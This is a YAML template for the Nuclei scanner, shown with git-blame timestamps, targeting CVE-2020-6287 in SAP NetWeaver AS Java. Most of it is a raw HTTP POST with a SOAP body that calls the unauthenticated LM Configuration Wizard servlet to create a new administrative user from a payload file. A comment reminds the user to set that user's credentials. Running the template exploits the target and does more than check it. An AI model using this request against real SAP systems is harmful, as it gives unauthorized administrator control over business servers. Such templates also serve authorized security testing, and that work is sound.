2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-6287
|
2020-07-21 06:53:00 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
|
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2020,sap
|
2020-07-21 06:53:00 +00:00
|
|
|
|
|
|
|
# Affected Versions: 7.30, 7.31, 7.40, 7.50
|
|
|
|
|
|
|
|
# p.s:
|
|
|
|
# > Don't forget to change the default credentials
|
|
|
|
# > to create new admin in associated file:
|
|
|
|
# > `payloads/CVE-2020-6287.xml`
|
|
|
|
|
|
|
|
# Ref:
|
|
|
|
# - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- payloads:
|
2021-01-09 13:28:57 +00:00
|
|
|
data: helpers/payloads/CVE-2020-6287.xml
|
2020-07-21 06:53:00 +00:00
|
|
|
raw:
|
|
|
|
- |
|
|
|
|
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: text/xml; charset=UTF-8
|
2020-07-21 08:00:14 +00:00
|
|
|
Connection: close
|
2020-07-21 06:53:00 +00:00
|
|
|
|
2020-11-21 06:55:49 +00:00
|
|
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
2020-07-21 06:53:00 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "urn:CTCWebServiceSi"
|
|
|
|
part: body
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|